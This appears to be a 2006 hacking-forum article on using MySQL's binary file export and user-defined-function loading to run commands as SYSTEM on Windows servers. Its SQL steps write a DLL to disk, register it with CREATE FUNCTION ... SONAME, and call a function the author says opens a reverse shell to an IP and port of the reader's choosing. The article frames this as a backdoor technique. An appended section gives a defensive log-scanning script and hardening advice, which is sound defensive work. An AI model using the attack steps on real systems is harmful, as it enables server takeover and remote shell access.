Executing system commands as SYSTEM through MySQL in a Windows environment

2006-04-23T00:00:00
ID MYHACK58:6220068824
Type myhack58
Reporter Anonymous
Modified 2006-04-23T00:00:00

Description

Some time ago two MySQL vulnerabilities were announced: "MySQL CREATE FUNCTION mysql.func table allows injecting an arbitrary function library" and "MySQL CREATE FUNCTION libc library allows arbitrary code execution". A careful study of these two vulnerabilities reveals two capabilities of MySQL:

First: you can upload binary files through MySQL, for example a UDF DLL you wrote yourself.

Second: you can register a Function from a self-written UDF DLL and execute arbitrary commands.

Note that these two capabilities are MySQL's own features, not vulnerabilities. The purpose of this article is not to study the two vulnerabilities above, but to use MySQL's own features to execute system commands as SYSTEM through MySQL in a Windows environment.

Before the vulnerability announcement appeared, as far as the author knows, not many people in China knew about uploading binary files through MySQL (PS: hopefully not too many tomatoes and eggs, heh). From the MySQL weak-password attacks that took off on the Grey Trajectories forum years ago until the vulnerability announcement appeared, people only used MySQL to upload text files, to make a WebShell or BAT, VBS and similar files for the startup group.

Executing arbitrary commands by registering a Function from a self-written UDF DLL is a technique that some people have known for a long time, but it was never fully disclosed and was passed around only privately as a backdoor method (PS: again, hopefully not too many tomatoes and eggs, heh).

In September of last year (2004), while writing the MySQL injection tool phprf, the author spent most of a day working out the binary-file upload method, which feels much the same as the method described in the vulnerability announcement. Executing arbitrary commands through a self-written UDF DLL, however, is something the author learned of only recently. After the vulnerability announcement came out, the author spent 2 to 3 hours finding UDF DLL material, wrote a DLL and tested it; there were no technical difficulties. In addition, MySQL on the Windows platform is started as a system service, and very few people change its startup account, so by combining these two MySQL capabilities it is possible to execute system commands as SYSTEM through MySQL.

Upload binary file

The following two tables illustrate the upload method from the vulnerability announcement and the upload method from the author's own research.

$solib="0x7f454c46010101000000000000..............

Define the binary data in hexadecimal representation

CREATE TABLE blob_tab (blob_col BLOB);

Set up a data table to store binary data

INSERT into blob_tab values (CONVERT($solib,CHAR));

The binary data is stored into the table

SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';

Export binary data to a file

Table 1: Upload method from the vulnerability announcement

set @a = concat('',0x4d5a900003000000);

set @a = concat(@a,0x04000000ffff0000b80000000);

......

Define the binary data in hexadecimal representation

create table Mix(data LONGBLOB);

Set up a data table to store binary data

insert into Mix values("");update Mix set data = @a;

The binary data is stored into the table

select data from Mix into DUMPFILE 'C:\\Winnt\\Mix.dll';

Export binary data to a file

In both tables, the binary data is the binary content of the self-written UDF DLL.

The upload method from the vulnerability announcement has to be implemented in a PHP program and cannot be carried out by hand from a MySQL client login, whereas the author's upload method can be carried out manually through a MySQL client login. Which one is better or worse is not discussed here; combining the two methods works somewhat better.

Register Function to execute commands

For those who want to write their own UDF DLL, the easiest way is to download the MySQL source code, which contains a udf_example. The author gives only a brief introduction below:

extern "C" {...} // declares the Function's functions; a standard Function has at least three functions

Mix() // required main function; handles the Function's processing flow, and the reverse-connection code is written inside it

Mix_init() // optional initialization function, generally used to check the parameters the user passed in

Mix_deinit() // optional; does the post-processing when the Function exits

Further details can be found at: http://netlab.cse.yzu.edu.tw/~statue/cfc/docs/mysqldoc_big5/manual_Adding_functions.html. Anyone with a bit of programming skill should be able to understand the udf_example source code. Before compiling, don't forget to modify udf_example.def!

The attachment contains a DLL written by the author; once it runs, it makes a reverse connection back with a Shell. The commands that need to be executed in the MySQL client are:

CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\Winnt\\Mix.dll'; /* Note: change the file path */

select Mixconnect('127.0.0.1','886'); /* Note: change the IP address and port number for the reverse connection */

The reverse-connection Shell portion of the attached DLL is adapted from publicly disclosed source code, so if Avira antivirus flags it, please do not be suspicious. The DLL is for testing only; the author and the Phantom Brigade are not responsible for the consequences of testing!
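Seen from the defending side, both steps described above (the binary upload with INTO DUMPFILE and the CREATE FUNCTION ... SONAME registration) leave recognisable statements in the MySQL general query log. The following detection sketch is an added example, not code from the original article or its attachment; the rule names, function names and sample statements are constructed, and it assumes the statements have already been extracted from the log.

```python
import re

# Constructed general-query-log statements (not from the original page); their
# shapes follow the article's two tables and its CREATE FUNCTION step.
SAMPLE_LOG = [
    r"set @a = concat('',0x4d5a900003000000)",
    r"select data from Mix into DUMPFILE 'C:\\Winnt\\Mix.dll'",
    r"CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\Winnt\\Mix.dll'",
    r"SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0'",
    r"SELECT name FROM customers INTO OUTFILE '/tmp/report.csv'",  # benign
]

# Hex literal that starts with a PE ("MZ") or ELF magic number.
EXE_HEX = re.compile(r"0x(4d5a|7f454c46)[0-9a-f]*", re.I)
DUMPFILE = re.compile(r"\bINTO\s+DUMPFILE\s+'([^']+)'", re.I)
SONAME = re.compile(
    r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+"
    r"\s+SONAME\s+'([^']+)'", re.I)
LIB_EXT = re.compile(r"\.(dll|so)(\.\d+)*$", re.I)

def basename(path):
    """Last path component, lower-cased; separators may be / or backslash."""
    return re.split(r"[\\/]+", path)[-1].lower()

def scan(statements):
    """Return (statement_index, rule, detail) for each suspicious statement."""
    findings = []
    for i, stmt in enumerate(statements):
        m = EXE_HEX.search(stmt)
        if m:
            findings.append((i, "exe-magic-hex", m.group(1).lower()))
        m = DUMPFILE.search(stmt)
        if m and LIB_EXT.search(m.group(1)):
            findings.append((i, "dumpfile-library", basename(m.group(1))))
        m = SONAME.search(stmt)
        if m:
            findings.append((i, "udf-register", basename(m.group(2))))
    return findings

def dropped_then_loaded(findings):
    """Libraries written with INTO DUMPFILE and later registered via SONAME."""
    dropped, chained = {}, []
    for i, rule, name in findings:
        if rule == "dumpfile-library":
            dropped.setdefault(name, i)
        elif rule == "udf-register" and name in dropped:
            chained.append((name, dropped[name], i))
    return chained
```

A library that is both written by INTO DUMPFILE and then named in SONAME is the strongest signal of the three. The underlying exposure is reduced by running the MySQL service under a dedicated low-privilege account instead of SYSTEM and by withholding the FILE privilege and INSERT on the mysql database from application accounts.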